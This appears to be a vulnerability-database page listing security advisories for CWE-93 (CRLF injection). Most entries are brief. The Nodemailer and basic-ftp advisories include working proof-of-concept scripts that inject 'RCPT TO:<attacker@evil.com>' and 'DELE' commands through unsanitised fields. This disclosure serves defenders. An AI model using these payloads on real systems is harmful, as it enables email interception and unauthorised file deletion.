CWE-93
AllowedImproper Neutralization of CRLF Sequences ('CRLF Injection')
Abstraction: Base · Status: Draft
The product uses CRLF (carriage return line feeds) as a special element, e.g. to separate lines or records, but it does not neutralize or incorrectly neutralizes CRLF sequences from inputs.
323 vulnerabilities reference this CWE, most recent first.
GHSA-9MMM-R5XW-7773
Vulnerability from github – Published: 2026-05-12 21:31 – Updated: 2026-05-12 21:31PowerSYSTEM Center email notification service is affected by a CRLF injection vulnerability when using SMTPS communication.
{
"affected": [],
"aliases": [
"CVE-2026-35504"
],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-12T21:16:15Z",
"severity": "MODERATE"
},
"details": "PowerSYSTEM Center email notification service is affected by a CRLF injection vulnerability when using SMTPS communication.",
"id": "GHSA-9mmm-r5xw-7773",
"modified": "2026-05-12T21:31:36Z",
"published": "2026-05-12T21:31:36Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35504"
},
{
"type": "WEB",
"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2026/icsa-26-132-02.json"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-26-132-02"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-9RPW-6GHH-QX6Q
Vulnerability from github – Published: 2024-03-12 15:32 – Updated: 2024-03-12 15:32The software does not neutralize or incorrectly neutralizes certain characters before the data is included in outgoing HTTP headers. The inclusion of invalidated data in an HTTP header allows an attacker to specify the full HTTP response represented by the browser. An attacker could control the response and craft attacks such as cross-site scripting and cache poisoning attacks.
{
"affected": [],
"aliases": [
"CVE-2024-1226"
],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-12T15:15:47Z",
"severity": "HIGH"
},
"details": "The software does not neutralize or incorrectly neutralizes certain characters before the data is included in outgoing HTTP headers. The inclusion of invalidated data in an HTTP header allows an attacker to specify the full HTTP response represented by the browser. An attacker could control the response and craft attacks such as cross-site scripting and cache poisoning attacks.",
"id": "GHSA-9rpw-6ghh-qx6q",
"modified": "2024-03-12T15:32:21Z",
"published": "2024-03-12T15:32:21Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1226"
},
{
"type": "WEB",
"url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-rejettos-http-file-server"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-C4RV-J252-RMPG
Vulnerability from github – Published: 2026-04-14 18:30 – Updated: 2026-04-22 15:31CWE-93 Improper Neutralization of CRLF Sequences ('CRLF Injection') vulnerability exists that could cause application user credentials to reset when a Web Admin user alters the POST /setPCBEDesc request payload.
{
"affected": [],
"aliases": [
"CVE-2026-2400"
],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-14T16:16:38Z",
"severity": "MODERATE"
},
"details": "CWE-93 Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027) vulnerability exists that could cause application user credentials to reset when a Web Admin user alters the POST /setPCBEDesc request payload.",
"id": "GHSA-c4rv-j252-rmpg",
"modified": "2026-04-22T15:31:32Z",
"published": "2026-04-14T18:30:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2400"
},
{
"type": "WEB",
"url": "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2026-104-01\u0026p_enDocType=Security+and+Safety+Notice\u0026p_File_Name=SEVD-2026-104-01.pdf"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-C7W3-X93F-QMM8
Vulnerability from github – Published: 2026-03-26 22:26 – Updated: 2026-03-26 22:26Summary
When a custom envelope object is passed to sendMail() with a size property containing CRLF characters (\r\n), the value is concatenated directly into the SMTP MAIL FROM command without sanitization. This allows injection of arbitrary SMTP commands, including RCPT TO — silently adding attacker-controlled recipients to outgoing emails.
Details
In lib/smtp-connection/index.js (lines 1161-1162), the envelope.size value is concatenated into the SMTP MAIL FROM command without any CRLF sanitization:
if (this._envelope.size && this._supportedExtensions.includes('SIZE')) {
args.push('SIZE=' + this._envelope.size);
}
This contrasts with other envelope parameters in the same function that ARE properly sanitized:
- Addresses (from, to): validated for [\r\n<>] at lines 1107-1127
- DSN parameters (dsn.ret, dsn.envid, dsn.orcpt): encoded via encodeXText() at lines 1167-1183
The size property reaches this code path through MimeNode.setEnvelope() in lib/mime-node/index.js (lines 854-858), which copies all non-standard envelope properties verbatim:
const standardFields = ['to', 'cc', 'bcc', 'from'];
Object.keys(envelope).forEach(key => {
if (!standardFields.includes(key)) {
this._envelope[key] = envelope[key];
}
});
Since _sendCommand() writes the command string followed by \r\n to the raw TCP socket, a CRLF in the size value terminates the MAIL FROM command and starts a new SMTP command.
Note: by default, Nodemailer constructs the envelope automatically from the message's from/to fields and does not include size. This vulnerability requires the application to explicitly pass a custom envelope object with a size property to sendMail().
While this limits the attack surface, applications that expose envelope configuration to users are affected.
PoC
ave the following as poc.js and run with node poc.js:
const net = require('net');
const nodemailer = require('nodemailer');
// Minimal SMTP server that logs raw commands
const server = net.createServer(socket => {
socket.write('220 localhost ESMTP\r\n');
let buffer = '';
socket.on('data', chunk => {
buffer += chunk.toString();
const lines = buffer.split('\r\n');
buffer = lines.pop();
for (const line of lines) {
if (!line) continue;
console.log('C:', line);
if (line.startsWith('EHLO')) {
socket.write('250-localhost\r\n250-SIZE 10485760\r\n250 OK\r\n');
} else if (line.startsWith('MAIL FROM')) {
socket.write('250 OK\r\n');
} else if (line.startsWith('RCPT TO')) {
socket.write('250 OK\r\n');
} else if (line === 'DATA') {
socket.write('354 Start\r\n');
} else if (line === '.') {
socket.write('250 OK\r\n');
} else if (line.startsWith('QUIT')) {
socket.write('221 Bye\r\n');
socket.end();
}
}
});
});
server.listen(0, '127.0.0.1', () => {
const port = server.address().port;
console.log('SMTP server on port', port);
console.log('Sending email with injected RCPT TO...\n');
const transporter = nodemailer.createTransport({
host: '127.0.0.1',
port,
secure: false,
tls: { rejectUnauthorized: false },
});
transporter.sendMail({
from: 'sender@example.com',
to: 'recipient@example.com',
subject: 'Normal email',
text: 'This is a normal email.',
envelope: {
from: 'sender@example.com',
to: ['recipient@example.com'],
size: '100\r\nRCPT TO:<attacker@evil.com>',
},
}, (err) => {
if (err) console.error('Error:', err.message);
console.log('\nExpected output above:');
console.log(' C: MAIL FROM:<sender@example.com> SIZE=100');
console.log(' C: RCPT TO:<attacker@evil.com> <-- INJECTED');
console.log(' C: RCPT TO:<recipient@example.com>');
server.close();
transporter.close();
});
});
Expected output:
SMTP server on port 12345
Sending email with injected RCPT TO...
C: EHLO [127.0.0.1]
C: MAIL FROM:<sender@example.com> SIZE=100
C: RCPT TO:<attacker@evil.com>
C: RCPT TO:<recipient@example.com>
C: DATA
...
C: .
C: QUIT
The RCPT TO:<attacker@evil.com> line is injected by the CRLF in the size field, silently adding an extra recipient to the email.
Impact
This is an SMTP command injection vulnerability. An attacker who can influence the envelope.size property in a sendMail() call can:
- Silently add hidden recipients to outgoing emails via injected
RCPT TOcommands, receiving copies of all emails sent through the affected transport - Inject arbitrary SMTP commands (e.g.,
RSET, additionalMAIL FROMto send entirely separate emails through the server) - Leverage the sending organization's SMTP server reputation for spam or phishing delivery
The severity is mitigated by the fact that the envelope object must be explicitly provided by the application. Nodemailer's default envelope construction from message headers does not include size. Applications that pass through user-controlled data to the envelope options (e.g., via API parameters, admin panels, or template configurations) are vulnerable.
Affected versions: at least v8.0.3 (current); likely all versions where envelope.size is supported.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "nodemailer"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "8.0.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-26T22:26:46Z",
"nvd_published_at": null,
"severity": "LOW"
},
"details": "### Summary\nWhen a custom `envelope` object is passed to `sendMail()` with a `size` property containing CRLF characters (`\\r\\n`), the value is concatenated directly into the SMTP `MAIL FROM` command without sanitization. This allows injection of arbitrary SMTP commands, including `RCPT TO` \u2014 silently adding attacker-controlled recipients to outgoing emails.\n\n\n### Details\nIn `lib/smtp-connection/index.js` (lines 1161-1162), the `envelope.size` value is concatenated into the SMTP `MAIL FROM` command without any CRLF sanitization:\n\n```javascript\nif (this._envelope.size \u0026\u0026 this._supportedExtensions.includes(\u0027SIZE\u0027)) {\n args.push(\u0027SIZE=\u0027 + this._envelope.size);\n}\n```\n\nThis contrasts with other envelope parameters in the same function that ARE properly sanitized:\n- **Addresses** (`from`, `to`): validated for `[\\r\\n\u003c\u003e]` at lines 1107-1127\n- **DSN parameters** (`dsn.ret`, `dsn.envid`, `dsn.orcpt`): encoded via `encodeXText()` at lines 1167-1183\n\nThe `size` property reaches this code path through `MimeNode.setEnvelope()` in `lib/mime-node/index.js` (lines 854-858), which copies all non-standard envelope properties verbatim:\n\n```javascript\nconst standardFields = [\u0027to\u0027, \u0027cc\u0027, \u0027bcc\u0027, \u0027from\u0027];\nObject.keys(envelope).forEach(key =\u003e {\n if (!standardFields.includes(key)) {\n this._envelope[key] = envelope[key];\n }\n});\n```\n\nSince `_sendCommand()` writes the command string followed by `\\r\\n` to the raw TCP socket, a CRLF in the `size` value terminates the `MAIL FROM` command and starts a new SMTP command.\n\nNote: by default, Nodemailer constructs the envelope automatically from the message\u0027s `from`/`to` fields and does not include `size`. This vulnerability requires the application to explicitly pass a custom `envelope` object with a `size` property to `sendMail()`. \nWhile this limits the attack surface, applications that expose envelope configuration to users are affected.\n\n### PoC\nave the following as `poc.js` and run with `node poc.js`:\n\n```javascript\nconst net = require(\u0027net\u0027);\nconst nodemailer = require(\u0027nodemailer\u0027);\n\n// Minimal SMTP server that logs raw commands\nconst server = net.createServer(socket =\u003e {\n socket.write(\u0027220 localhost ESMTP\\r\\n\u0027);\n let buffer = \u0027\u0027;\n socket.on(\u0027data\u0027, chunk =\u003e {\n buffer += chunk.toString();\n const lines = buffer.split(\u0027\\r\\n\u0027);\n buffer = lines.pop();\n for (const line of lines) {\n if (!line) continue;\n console.log(\u0027C:\u0027, line);\n if (line.startsWith(\u0027EHLO\u0027)) {\n socket.write(\u0027250-localhost\\r\\n250-SIZE 10485760\\r\\n250 OK\\r\\n\u0027);\n } else if (line.startsWith(\u0027MAIL FROM\u0027)) {\n socket.write(\u0027250 OK\\r\\n\u0027);\n } else if (line.startsWith(\u0027RCPT TO\u0027)) {\n socket.write(\u0027250 OK\\r\\n\u0027);\n } else if (line === \u0027DATA\u0027) {\n socket.write(\u0027354 Start\\r\\n\u0027);\n } else if (line === \u0027.\u0027) {\n socket.write(\u0027250 OK\\r\\n\u0027);\n } else if (line.startsWith(\u0027QUIT\u0027)) {\n socket.write(\u0027221 Bye\\r\\n\u0027);\n socket.end();\n }\n }\n });\n});\n\nserver.listen(0, \u0027127.0.0.1\u0027, () =\u003e {\n const port = server.address().port;\n console.log(\u0027SMTP server on port\u0027, port);\n console.log(\u0027Sending email with injected RCPT TO...\\n\u0027);\n\n const transporter = nodemailer.createTransport({\n host: \u0027127.0.0.1\u0027,\n port,\n secure: false,\n tls: { rejectUnauthorized: false },\n });\n\n transporter.sendMail({\n from: \u0027sender@example.com\u0027,\n to: \u0027recipient@example.com\u0027,\n subject: \u0027Normal email\u0027,\n text: \u0027This is a normal email.\u0027,\n envelope: {\n from: \u0027sender@example.com\u0027,\n to: [\u0027recipient@example.com\u0027],\n size: \u0027100\\r\\nRCPT TO:\u003cattacker@evil.com\u003e\u0027,\n },\n }, (err) =\u003e {\n if (err) console.error(\u0027Error:\u0027, err.message);\n console.log(\u0027\\nExpected output above:\u0027);\n console.log(\u0027 C: MAIL FROM:\u003csender@example.com\u003e SIZE=100\u0027);\n console.log(\u0027 C: RCPT TO:\u003cattacker@evil.com\u003e \u003c-- INJECTED\u0027);\n console.log(\u0027 C: RCPT TO:\u003crecipient@example.com\u003e\u0027);\n server.close();\n transporter.close();\n });\n});\n```\n\n**Expected output:**\n```\nSMTP server on port 12345\nSending email with injected RCPT TO...\n\nC: EHLO [127.0.0.1]\nC: MAIL FROM:\u003csender@example.com\u003e SIZE=100\nC: RCPT TO:\u003cattacker@evil.com\u003e\nC: RCPT TO:\u003crecipient@example.com\u003e\nC: DATA\n...\nC: .\nC: QUIT\n```\n\nThe `RCPT TO:\u003cattacker@evil.com\u003e` line is injected by the CRLF in the `size` field, silently adding an extra recipient to the email.\n\n### Impact\nThis is an SMTP command injection vulnerability. An attacker who can influence the `envelope.size` property in a `sendMail()` call can:\n\n- **Silently add hidden recipients** to outgoing emails via injected `RCPT TO` commands, receiving copies of all emails sent through the affected transport\n- **Inject arbitrary SMTP commands** (e.g., `RSET`, additional `MAIL FROM` to send entirely separate emails through the server)\n- **Leverage the sending organization\u0027s SMTP server reputation** for spam or phishing delivery\n\nThe severity is mitigated by the fact that the `envelope` object must be explicitly provided by the application. Nodemailer\u0027s default envelope construction from message headers does not include `size`. Applications that pass through user-controlled data to the envelope options (e.g., via API parameters, admin panels, or template configurations) are vulnerable.\n\nAffected versions: at least v8.0.3 (current); likely all versions where `envelope.size` is supported.",
"id": "GHSA-c7w3-x93f-qmm8",
"modified": "2026-03-26T22:26:46Z",
"published": "2026-03-26T22:26:46Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-c7w3-x93f-qmm8"
},
{
"type": "WEB",
"url": "https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651"
},
{
"type": "PACKAGE",
"url": "https://github.com/nodemailer/nodemailer"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Nodemailer has SMTP command injection due to unsanitized `envelope.size` parameter"
}
GHSA-C9J2-XR8M-5HH8
Vulnerability from github – Published: 2022-05-17 02:42 – Updated: 2025-04-20 03:38CRLF injection vulnerability in the web interface in OpenVPN Access Server 2.1.4 allows remote attackers to inject arbitrary HTTP headers and consequently conduct session fixation attacks and possibly HTTP response splitting attacks via "%0A" characters in the PATH_INFO to session_start/.
{
"affected": [],
"aliases": [
"CVE-2017-5868"
],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-05-26T01:29:00Z",
"severity": "MODERATE"
},
"details": "CRLF injection vulnerability in the web interface in OpenVPN Access Server 2.1.4 allows remote attackers to inject arbitrary HTTP headers and consequently conduct session fixation attacks and possibly HTTP response splitting attacks via \"%0A\" characters in the PATH_INFO to __session_start__/.",
"id": "GHSA-c9j2-xr8m-5hh8",
"modified": "2025-04-20T03:38:14Z",
"published": "2022-05-17T02:42:44Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5868"
},
{
"type": "WEB",
"url": "https://sysdream.com/news/lab/2017-05-05-cve-2017-5868-openvpn-access-server-crlf-injection-with-session-fixation"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2017/05/23/13"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1038547"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-C9Q8-FG52-4CRV
Vulnerability from github – Published: 2026-03-25 18:31 – Updated: 2026-03-25 18:31A vulnerability in the web-based Cisco IOx application hosting environment management interface of Cisco IOS XE Software could allow an unauthenticated, remote attacker to perform a carriage return line feed (CRLF) injection attack against a user.
This vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by sending crafted packets to an affected device. A successful exploit could allow the attacker to arbitrarily inject log entries, manipulate the structure of log files, or obscure legitimate log events.
{
"affected": [],
"aliases": [
"CVE-2026-20113"
],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-25T16:16:15Z",
"severity": "MODERATE"
},
"details": "A vulnerability in the web-based Cisco IOx application hosting environment management interface of Cisco IOS XE Software could allow an unauthenticated, remote attacker to perform a carriage return line feed (CRLF) injection attack against a user.\n\n This vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by sending crafted packets to an affected device. A successful exploit could allow the attacker to arbitrarily inject log entries, manipulate the structure of log files, or obscure legitimate log events.",
"id": "GHSA-c9q8-fg52-4crv",
"modified": "2026-03-25T18:31:47Z",
"published": "2026-03-25T18:31:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-20113"
},
{
"type": "WEB",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iox-crlf-NvgKTKJZ"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-CCG4-2824-V53P
Vulnerability from github – Published: 2026-03-28 12:30 – Updated: 2026-03-28 12:30The Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress is vulnerable to Improper Neutralization of CRLF Sequences ('CRLF Injection') in all versions up to, and including, 2.0.7. This is due to the contact form handler performing placeholder substitution on attacker-controlled form fields and then passing the resulting values into email headers without removing CR/LF characters. This makes it possible for unauthenticated attackers to inject arbitrary email headers (for example Bcc / Cc) and abuse form email delivery via the 'email' parameter granted they can target a contact form configured to use placeholders in mail template headers.
{
"affected": [],
"aliases": [
"CVE-2026-2442"
],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-28T10:16:30Z",
"severity": "MODERATE"
},
"details": "The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027) in all versions up to, and including, 2.0.7. This is due to the contact form handler performing placeholder substitution on attacker-controlled form fields and then passing the resulting values into email headers without removing CR/LF characters. This makes it possible for unauthenticated attackers to inject arbitrary email headers (for example Bcc / Cc) and abuse form email delivery via the \u0027email\u0027 parameter granted they can target a contact form configured to use placeholders in mail template headers.",
"id": "GHSA-ccg4-2824-v53p",
"modified": "2026-03-28T12:30:29Z",
"published": "2026-03-28T12:30:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2442"
},
{
"type": "WEB",
"url": "https://plugins.trac.wordpress.org/changeset/3464204/pagelayer"
},
{
"type": "WEB",
"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ce101aad-10a3-4a8c-9f4a-0e38e35b4dab?source=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-CF58-JJQ5-73MM
Vulnerability from github – Published: 2022-05-13 01:06 – Updated: 2022-05-13 01:06CRLF injection vulnerability in the web-based management (WBM) interface in Unify (former Siemens) OpenStage SIP and OpenScape Desk Phone IP V3 devices before R3.32.0 allows remote authenticated users to modify the root password and consequently access the debug port using the serial interface via the ssh-password parameter to page.cmd.
{
"affected": [],
"aliases": [
"CVE-2014-9563"
],
"database_specific": {
"cwe_ids": [
"CWE-93"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2018-04-12T21:29:00Z",
"severity": "MODERATE"
},
"details": "CRLF injection vulnerability in the web-based management (WBM) interface in Unify (former Siemens) OpenStage SIP and OpenScape Desk Phone IP V3 devices before R3.32.0 allows remote authenticated users to modify the root password and consequently access the debug port using the serial interface via the ssh-password parameter to page.cmd.",
"id": "GHSA-cf58-jjq5-73mm",
"modified": "2022-05-13T01:06:13Z",
"published": "2022-05-13T01:06:13Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2014-9563"
},
{
"type": "WEB",
"url": "https://networks.unify.com/security/advisories/OBSO-1501-02.pdf"
},
{
"type": "WEB",
"url": "https://www.modzero.ch/advisories/MZ-14-02-Siemens-Unify-OpenStage.txt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-CFJ9-2VGR-HPXP
Vulnerability from github – Published: 2026-06-24 15:31 – Updated: 2026-06-30 03:37Jenkins Script Security Plugin 1402.v94c9ce464861 and earlier does not reject Groovy AST transformation annotations carrying an extensions member, allowing attackers able to run sandboxed Groovy scripts to execute code outside the sandbox if a suitable script is present on the classpath of the component that evaluates the script.
{
"affected": [],
"aliases": [
"CVE-2026-57281"
],
"database_specific": {
"cwe_ids": [
"CWE-917",
"CWE-93"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-24T14:17:34Z",
"severity": "HIGH"
},
"details": "Jenkins Script Security Plugin 1402.v94c9ce464861 and earlier does not reject Groovy AST transformation annotations carrying an extensions member, allowing attackers able to run sandboxed Groovy scripts to execute code outside the sandbox if a suitable script is present on the classpath of the component that evaluates the script.",
"id": "GHSA-cfj9-2vgr-hpxp",
"modified": "2026-06-30T03:37:10Z",
"published": "2026-06-24T15:31:47Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57281"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2026-57281"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492200"
},
{
"type": "WEB",
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-57281.json"
},
{
"type": "WEB",
"url": "https://www.jenkins.io/security/advisory/2026-06-24/#SECURITY-3793"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CHQC-8P9Q-PQ6Q
Vulnerability from github – Published: 2026-04-08 20:02 – Updated: 2026-04-09 19:06Summary
basic-ftp version 5.2.0 allows FTP command injection via CRLF sequences (\r\n) in file path parameters passed to high-level path APIs such as cd(), remove(), rename(), uploadFrom(), downloadTo(), list(), and removeDir(). The library's protectWhitespace() helper only handles leading spaces and returns other paths unchanged, while FtpContext.send() writes the resulting command string directly to the control socket with \r\n appended. This lets attacker-controlled path strings split one intended FTP command into multiple commands.
Affected product
| Product | Affected versions | Fixed version |
|---|---|---|
| basic-ftp (npm) | 5.2.0 (confirmed) | no fix available as of 2026-04-04 |
Vulnerability details
- CWE:
CWE-93- Improper Neutralization of CRLF Sequences ('CRLF Injection') - CVSS 3.1:
8.6(High) - Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L - Affected component:
dist/Client.js, all path-handling methods viaprotectWhitespace()andsend()
The vulnerability exists because of two interacting code patterns:
1. Inadequate path sanitization in protectWhitespace() (line 677):
async protectWhitespace(path) {
if (!path.startsWith(" ")) {
return path; // No sanitization of \r\n characters
}
const pwd = await this.pwd();
const absolutePathPrefix = pwd.endsWith("/") ? pwd : pwd + "/";
return absolutePathPrefix + path;
}
This function only handles leading whitespace. It does not strip or reject \r (0x0D) or \n (0x0A) characters anywhere in the path string.
2. Direct socket write in send() (FtpContext.js line 177):
send(command) {
this._socket.write(command + "\r\n", this.encoding);
}
The send() method appends \r\n to the command and writes directly to the TCP socket. If the command string already contains \r\n sequences (from unsanitized path input), the FTP server interprets them as command delimiters, causing the single intended command to be split into multiple commands.
Affected methods (all call protectWhitespace() → send()):
- cd(path) → CWD ${path}
- remove(path) → DELE ${path}
- list(path) → LIST ${path}
- downloadTo(localPath, remotePath) → RETR ${remotePath}
- uploadFrom(localPath, remotePath) → STOR ${remotePath}
- rename(srcPath, destPath) → RNFR ${srcPath} / RNTO ${destPath}
- removeDir(path) → RMD ${path}
Technical impact
An attacker who controls file path parameters can inject arbitrary FTP protocol commands, enabling:
- Arbitrary file deletion: Inject
DELE /critical-fileto delete files on the FTP server - Directory manipulation: Inject
MKDorRMDcommands to create/remove directories - File exfiltration: Inject
RETRcommands to trigger downloads of unintended files - Server command execution: On FTP servers supporting
SITE EXEC, inject system commands - Session hijacking: Inject
USER/PASScommands to re-authenticate as a different user - Service disruption: Inject
QUITto terminate the FTP session unexpectedly
The attack is realistic in applications that accept user input for FTP file paths — for example, web applications that allow users to specify files to download from or upload to an FTP server.
Proof of concept
Prerequisites:
mkdir basic-ftp-poc && cd basic-ftp-poc
npm init -y
npm install basic-ftp@5.2.0
Mock FTP server (ftp-server-mock.js):
const net = require('net');
const server = net.createServer(conn => {
console.log('[+] Client connected');
conn.write('220 Mock FTP\r\n');
let buffer = '';
conn.on('data', data => {
buffer += data.toString();
const lines = buffer.split('\r\n');
buffer = lines.pop();
for (const line of lines) {
if (!line) continue;
console.log('[CMD] ' + JSON.stringify(line));
if (line.startsWith('USER')) conn.write('331 OK\r\n');
else if (line.startsWith('PASS')) conn.write('230 Logged in\r\n');
else if (line.startsWith('FEAT')) conn.write('211 End\r\n');
else if (line.startsWith('TYPE')) conn.write('200 OK\r\n');
else if (line.startsWith('PWD')) conn.write('257 "/"\r\n');
else if (line.startsWith('OPTS')) conn.write('200 OK\r\n');
else if (line.startsWith('STRU')) conn.write('200 OK\r\n');
else if (line.startsWith('CWD')) conn.write('250 OK\r\n');
else if (line.startsWith('DELE')) conn.write('250 Deleted\r\n');
else if (line.startsWith('QUIT')) { conn.write('221 Bye\r\n'); conn.end(); }
else conn.write('200 OK\r\n');
}
});
});
server.listen(2121, () => console.log('[*] Mock FTP on port 2121'));
Exploit (poc.js):
const ftp = require('basic-ftp');
async function exploit() {
const client = new ftp.Client();
client.ftp.verbose = true;
try {
await client.access({
host: '127.0.0.1',
port: 2121,
user: 'anonymous',
password: 'anonymous'
});
// Attack 1: Inject DELE command via cd()
// Intended: CWD harmless.txt
// Actual: CWD harmless.txt\r\nDELE /important-file.txt
const maliciousPath = "harmless.txt\r\nDELE /important-file.txt";
console.log('\n=== Attack 1: DELE injection via cd() ===');
try { await client.cd(maliciousPath); } catch(e) {}
// Attack 2: Double DELE via remove()
const maliciousPath2 = "decoy.txt\r\nDELE /secret-data.txt";
console.log('\n=== Attack 2: DELE injection via remove() ===');
try { await client.remove(maliciousPath2); } catch(e) {}
} finally {
client.close();
}
}
exploit();
Running the PoC:
# Terminal 1: Start mock FTP server
node ftp-server-mock.js
# Terminal 2: Run exploit
node poc.js
Expected output on mock server:
"OPTS UTF8 ON"
"USER anonymous"
"PASS anonymous"
"FEAT"
"TYPE I"
"STRU F"
"OPTS UTF8 ON"
"CWD harmless.txt"
"DELE /important-file.txt" <-- injected from cd()
"DELE decoy.txt"
"DELE /secret-data.txt" <-- injected from remove()
"QUIT"
This command trace was reproduced against the published basic-ftp@5.2.0
package on Linux with a local mock FTP server. The injected DELE commands are
received as distinct FTP commands, confirming that CRLF inside path parameters
is not neutralized before socket write.
Mitigation
Immediate workaround: Sanitize all path inputs before passing them to basic-ftp:
function sanitizeFtpPath(path) {
if (/[\r\n]/.test(path)) {
throw new Error('Invalid FTP path: contains control characters');
}
return path;
}
// Usage
await client.cd(sanitizeFtpPath(userInput));
Recommended fix for basic-ftp: The protectWhitespace() function (or a new validation layer) should reject or strip \r and \n characters from all path inputs:
async protectWhitespace(path) {
// Reject CRLF injection attempts
if (/[\r\n\0]/.test(path)) {
throw new Error('Invalid path: contains control characters');
}
if (!path.startsWith(" ")) {
return path;
}
const pwd = await this.pwd();
const absolutePathPrefix = pwd.endsWith("/") ? pwd : pwd + "/";
return absolutePathPrefix + path;
}
References
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "basic-ftp"
},
"ranges": [
{
"events": [
{
"introduced": "5.2.0"
},
{
"fixed": "5.2.1"
}
],
"type": "ECOSYSTEM"
}
],
"versions": [
"5.2.0"
]
}
],
"aliases": [
"CVE-2026-39983"
],
"database_specific": {
"cwe_ids": [
